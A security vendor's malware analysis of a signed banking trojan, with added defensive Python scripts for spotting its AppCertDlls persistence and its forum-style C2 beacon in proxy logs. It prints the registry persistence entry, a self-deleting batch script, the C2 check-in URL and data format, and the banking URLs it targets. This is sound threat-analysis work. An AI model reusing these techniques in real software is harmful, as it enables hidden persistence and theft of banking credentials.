As part of Comodo Labs’ ongoing analysis of digitally signed malware (a “digital signature” confirms the software author and guarantees that the program code has not been altered or corrupted since it was signed; “malware” is software used or created to disrupt computer operation, gather sensitive information, or gain access to computer systems), we recently discovered a new sample that uses an interesting and potentially devastating combination of techniques to deliver its “payload” (the cargo of a data transmission).
Starting with a digitally signed “dropper” (installation program), the malware was able to inject itself into Windows “processes” (instances of computer programs being executed); bypass the “firewall” (which protects against threats from the public Internet) and “host intrusion protection mechanisms” (which monitor a single computer for suspicious activity by analyzing events occurring within that computer); send user details to a control “server” (computer hardware dedicated to running one or more services); download additional “configuration files” (which configure the initial settings of a computer program); and finally direct its victims to “phishing” websites (designed to look like other websites in an attempt to steal users’ personal information) that request the user’s banking usernames and passwords. This document contains a detailed description of our observations.
The dropper (installer) component of the malware was digitally signed with a certificate issued by a trusted Certificate Authority. Because the installer was ‘trusted’, it was able to evade detection by the heuristic engines and Host Intrusion Protection Systems (HIPSs) of many popular antivirus and Internet Security programs.
Upon execution, the dropper first determines the architecture of the Windows operating system (32-bit or 64-bit) then extracts the appropriate main module from “PE” (Portable Executable) file resources.
The file name of this main module is generated by concatenating fragments of the names of two random “*.exe” (Windows Executable) files in the Windows system folder. For example, “diskpart.exe” (Windows text-mode disk partitioning tool) and “eventvwr.exe” (Microsoft Event Viewer) produce the file name “disktvwr.dll”.
The main module is the PE “DLL” (Dynamic Link Library of functions and other information that can be accessed by a Windows program) which is placed in the Windows system folder under this generated name. It is then injected into the operating system process “explorer.exe” (Windows Explorer).
It is configured for automatic injection into most operating system processes and user applications via a randomly named value of an obscure Windows Registry key (similar to a folder):
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"ddeskeys"="C:\\Windows\\system32\\disktvwr.dll"
As a result, the function “CreateProcessNotify”, exported by the malware “module” (a portion of the program that carries out a specific function and may be used alone or combined with other modules of the same program), is called by the operating system at the creation of each new process. This causes the malware DLL to be loaded into most operating system processes and user applications.
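The AppCertDlls key described above is the persistence mechanism a defender most wants to check for. The following script is an added example, not code from the original post or from Comodo: it parses a .reg-style export of the key (a constructed sample in the shape the post shows), lists every DLL registered there, and applies two heuristics drawn from the post, namely whether the DLL sits in the Windows system folder and whether its name can be spliced together from a prefix of one system executable and a suffix of another. The splicing rule is inferred from the post’s single diskpart.exe + eventvwr.exe → disktvwr.dll example, so the exact split the malware uses is an assumption and every split is tried; the system32 file list is likewise constructed rather than read from disk.

```python
import re

# Constructed sample: a .reg-style export of the AppCertDlls key in the shape the
# post shows (the disktvwr.dll value is the post's), plus a second, benign-looking
# value made up here so the heuristics have something to leave alone.
SAMPLE_REG_EXPORT = r'''
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls]
"ddeskeys"="C:\\Windows\\system32\\disktvwr.dll"
"audit"="C:\\Program Files\\ExampleVendor\\audit.dll"
'''

# Constructed stand-in for a directory listing of the Windows system folder;
# a real audit would build this list with os.listdir() on %SystemRoot%\System32.
SYSTEM32_EXES = ["diskpart.exe", "eventvwr.exe", "notepad.exe", "calc.exe", "regedit.exe"]

VALUE_RE = re.compile(r'^"([^"]+)"="([^"]+)"$')


def parse_appcertdlls(reg_text):
    """Return (value_name, dll_path) pairs from the AppCertDlls block of a .reg export."""
    entries, in_block = [], False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):                      # a new key header
            in_block = line.lower().endswith(r"\appcertdlls]")
            continue
        m = VALUE_RE.match(line) if in_block else None
        if m:
            # .reg files double every backslash inside string values
            entries.append((m.group(1), m.group(2).replace("\\\\", "\\")))
    return entries


def looks_spliced(dll_name, exe_names, min_fragment=3):
    """True if the DLL's base name can be built from a prefix of one system executable
    and a suffix of a different one. This is the naming scheme inferred from the post's
    single example (diskpart.exe + eventvwr.exe -> disktvwr.dll); the exact split the
    malware uses is an assumption, so every split of at least min_fragment chars is tried."""
    stem = dll_name.lower().rsplit(".", 1)[0]
    stems = [e.lower().rsplit(".", 1)[0] for e in exe_names]
    for i in range(min_fragment, len(stem) - min_fragment + 1):
        head, tail = stem[:i], stem[i:]
        heads = {s for s in stems if s.startswith(head)}
        tails = {s for s in stems if s.endswith(tail)}
        if any(h != t for h in heads for t in tails):
            return True
    return False


def audit_appcertdlls(reg_text, exe_names):
    """Flag every AppCertDlls entry and explain why each one deserves a look."""
    findings = []
    for value_name, path in parse_appcertdlls(reg_text):
        dll = path.rsplit("\\", 1)[-1]
        # Any AppCertDlls entry is worth reviewing: the DLL is mapped into every new process.
        reasons = ["AppCertDlls entry loads into every newly created process"]
        if looks_spliced(dll, exe_names):
            reasons.append("DLL name looks spliced from two system executable names")
        if "\\system32\\" in path.lower():
            reasons.append("DLL dropped directly into the Windows system folder")
        findings.append({"value": value_name, "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_appcertdlls(SAMPLE_REG_EXPORT, SYSTEM32_EXES):
        print(finding["value"], "->", finding["path"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

On a live machine the input would come from `reg export` of the key, and each flagged path would then be checked for a valid Authenticode signature (for example with PowerShell’s Get-AuthenticodeSignature); an AppCertDlls entry pointing at an unsigned DLL in system32 with an odd name is the pattern the post describes.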
After this operation, the dropper removes itself via the execution of a simple “DOS” (Disk Operating System) “BAT” (batch) script file:
1342562.bat:
attrib -s -r -h %1
:hkiflg
del %1
if exist %1 goto hkiflg
del %0
The main module injected into the “explorer.exe” process acts as a server application. It opens a named “pipe” (a temporary software connection between two programs or commands) whose name is a 128-bit unique ID (UID), for example \\.\pipe\{b2459e76-035d-2d18-0a97-debbcce1c0a5}, and waits for incoming messages. Modules injected into other system processes and user applications act as “clients” (applications or systems that access a service made available by a server) and communicate with the server via this named pipe.
Modules injected into the “iexplore.exe” (Microsoft Internet Explorer) and “firefox.exe” (Mozilla Firefox) web browser applications are used for communication with the remote control server. This fools firewall and HIPS technology, because network activity generated by the malware appears to have been initiated by the user. The current version of the malware does not support other browsers such as “chrome.exe” (Google Chrome), “opera.exe” (Opera) and “safari.exe” (Apple Safari). To work around this limitation, it prevents these browsers from opening and forces the user to use one of the supported browsers instead. The malware communicates with its remote control server by imitating access to a forum topic. Initially it sends an “HTTP” (Hypertext Transfer Protocol) “POST” request (a request method asking the web server to accept the data enclosed in the request message’s body) to a “URL” (Uniform Resource Locator, the global address of a web page on the World Wide Web) of the following format:
http://*.*.*.*/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c
…with the request body containing basic information about the user’s system and the installed malware module:
user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475&win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin
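The check-in request above has a shape that a web proxy or egress log can be searched for. The following script is an added example, not code from the original post or from Comodo: it runs over a few constructed proxy log lines (one of which reuses the post’s URL pattern and POST body; the 203.0.113.5 server address, the client addresses and the forum URL are made up), matches the viewtopic.php URL with an `f`, `t` and 32-hex `sid5` parameter, and decodes the form-encoded body into the fields the post lists. The `sid5` parameter name is the cheapest discriminator: phpBB, whose viewtopic.php URLs the beacon imitates, names its session parameter `sid`.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines: "<time> <client> <method> <url> <body-or-dash>".
# The beacon line reuses the URL shape and POST body from the post; the forum
# URL and the 203.0.113.5 server address are made up for this example.
SAMPLE_PROXY_LOG = [
    "10:14:03 10.0.0.7 GET http://forum.example/viewtopic.php?f=12&t=3456&sid=0123456789abcdef0123456789abcdef -",
    "10:14:09 10.0.0.7 POST http://203.0.113.5/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c "
    "user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475"
    "&win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin",
    "10:15:00 10.0.0.8 GET http://www.example.com/index.html -",
]

HEX32 = re.compile(r"[0-9a-fA-F]{32}")
# Every field the post's sample body carries; a genuine forum POST has none of them.
BEACON_FIELDS = {"user_id", "version_id", "socks", "build", "crc", "win", "arch", "user"}


def is_beacon_url(url):
    """Match the C2 URL shape: /viewtopic.php with f=, t= and a 32-hex 'sid5' parameter.
    phpBB names its session parameter 'sid', so 'sid5' alone separates the imitation
    from a real forum visit."""
    parts = urlsplit(url)
    if not parts.path.endswith("/viewtopic.php"):
        return False
    query = parse_qs(parts.query)
    sid5 = query.get("sid5", [""])[0]
    return "f" in query and "t" in query and HEX32.fullmatch(sid5) is not None


def parse_beacon_body(body):
    """Decode the form-encoded check-in body; None if it lacks the beacon's field set."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return fields if BEACON_FIELDS <= set(fields) else None


def scan_proxy_log(lines):
    """Return one hit per line whose URL matches the beacon, with the decoded body for POSTs."""
    hits = []
    for line in lines:
        time, client, method, url, body = line.split(" ", 4)
        if not is_beacon_url(url):
            continue
        decoded = parse_beacon_body(body) if method == "POST" else None
        hits.append({"time": time, "client": client, "url": url, "body": decoded})
    return hits


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit["time"], hit["client"], hit["url"])
        if hit["body"]:
            print("   reported:", hit["body"]["win"], "/", hit["body"]["arch"], "/ user", hit["body"]["user"])
```

The decoded body is useful beyond the alert itself: the `user_id`, `build` and `version_id` values identify the infected host and malware version, which helps when matching later check-ins from the same machine.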
It then receives an updated configuration file from the remote server. The malware stores the configuration and version information in a Windows Registry key named with a 128-bit UID, in the same way as the named pipe (the “Version” value of 0x2a, 42 in decimal, matches the version_id reported in the POST request):
[HKEY_CURRENT_USER\Software\AppDataLow\{21414dba-01d1-50fc-8e2b-a28ff0952499}]
"k1"=dword:b12564d0
"k2"=dword:473d87bb
"Version"=dword:0000002a
"Data"=hex:ca,2b,09,00,1b,e1,80,02,41,4c,3a,45,42,43,61,5f,09,31,39,36,cd,2f,\
  ...
The primary purpose of this malware is to steal personal information such as bank information or credit card accounts. This is a list of URLs monitored by the malware according to a recent configuration file:
bankofamerica.com/accounts-overview/accounts-overview.go
bankofamerica.com/login/sign-in/signOnScreen.go
bankofamerica.com/login/sign-in/validatePassword.go
bankofamerica.com/myaccounts/
barclaycardus.com/app/ccsite/logon/loginUserDyn.jsp
billmelater.com/login/challenge.xhtml
billmelater.com/your-account/home.xhtml
bofa.com
chaseonline.chase.com/gw/secure/ena
chaseonline.chase.com/MyAccounts.aspx
chaseonline.chase.com/secure/Profile/UpdateContactInfo/UpdateContact.aspx
client.schwab.com/Accounts/
client.schwab.com/Accounts/Summary/Summary.aspx
client.schwab.com/Service/MyProfile/MailingAddress.aspx
consumercenter.gogecapital.com/consumercenter/homeaction.do
discovercard.com/cardmembersvcs/achome/homepage
mbwebexpress.blilk.com/Core/Authentication/MFAPassword.aspx
mfasa.chase.com/auth/auth-stoken-osl.html
online.americanexpress.com/myca/acctmgmt/
online.citibank.com
online.wellsfargo.com/das/cgi-bin/session.cgi
onlinebanking.pnc.com/
onlinebanking.tdbank.com/login.asp
paypal.com/us/cgi-bin/webscr?cmd=_account
paypal.com/us/cgi-bin/webscr?cmd=_login-done
safe.bankofamerica.com/myaccounts/accounts-overview/accounts-overview.go
safe.bankofamerica.com/myaccounts/brain/redirect.go
safe.bankofamerica.com/myaccounts/signin/signIn.go?isSecureMobil
servicing.capitalone.com/C1/Accounts/Summary.aspx
shop.aafes.com/shop/Login.aspx
shopmyexchange.com
sitekey.bankofamerica.com/sas/signon.do
sitekey.bankofamerica.com/sas/signonSetup.do
sitekey.bankofamerica.com/sas/verifyImage.do
ss2.experian.com/securecontrol/reset/ssphome
suntrust.com/portal/server.pt
us.etrade.com/e/t/accounts/accountsCombo
us.hsbc.com/1/2/!ut/
wwws.ameritrade.com/cgi-bin/apps/SecurityChallenge
Once a user accesses one of the monitored URLs, the malware generates a phishing page that asks the user to enter their account details (including username, password and credit card number) under the pretense of either recovering their account password or enabling additional security measures.
File information:

Dropper EXE
  Size: 285264
  SHA-1: b9f07c2eec5277bfc91d4bb9b8bac4e8d4cc8632
  Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x86 DLL
  Size: 88576
  SHA-1: ba7f13855e7ad9c32917188281c4420cef8a830e
  Signature: TrojWare.Win32.TrojanSpy.Volisk.a

x64 DLL
  Size: 98304
  SHA-1: 372c2eafd39b317e6a94e84d673d394b2afd4b3f
  Signature: TrojWare.Win32.TrojanSpy.Volisk.a
Diagnosis, Removal & Protection Instructions
If your computer does not have an Antivirus or Internet Security program installed and you believe it may have been infected by “malware” (malicious software):
1. Download Comodo Antivirus and perform a full scan with an up-to-date antivirus database.
2. Remove the malware found by choosing from the recommended options and stay protected.